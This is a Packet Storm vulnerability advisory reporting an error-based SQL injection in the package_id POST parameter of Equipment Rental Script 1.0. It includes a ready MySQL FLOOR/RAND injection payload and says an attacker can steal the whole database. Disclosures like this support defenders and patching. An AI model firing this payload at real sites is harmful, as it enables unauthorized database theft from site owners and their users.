Equipment Rental Script 1.0 SQL Injection ≈ Packet Storm

Equipment Rental Script 1.0 SQL Injection ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

Equipment Rental Script 1.0 SQL Injection[6]
Authored by nu11secur1ty[7]

Equipment Rental Script version 1.0 suffers from a remote SQL injection vulnerability.

SHA-256 | 0ba0b1672e1ad0be57f6d8f077920536af11fdbfb040d7ce6901297ef47e3d6d

Change Mirror[11] Download[12]

        ## Title: Equipment Rental Script-1.0 - SQLi
## Author: nu11secur1ty
## Date: 09/12/2023
## Vendor:
## Software:
## Reference:
## Description:
The package_id parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the package_id parameter, and
a database error message was returned. You should review the contents
of the error message, and the application's handling of other input,
to confirm whether a vulnerability is present. The attacker can steal
all information from the database!
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: package_id=(-4488))) OR 1 GROUP BY
CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0
END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING
## Reproduce:
## Proof and Exploit:
## Time spent:

Login[13] or Register[14] to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services[119]
Hosting By

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.


"No secure path in the world"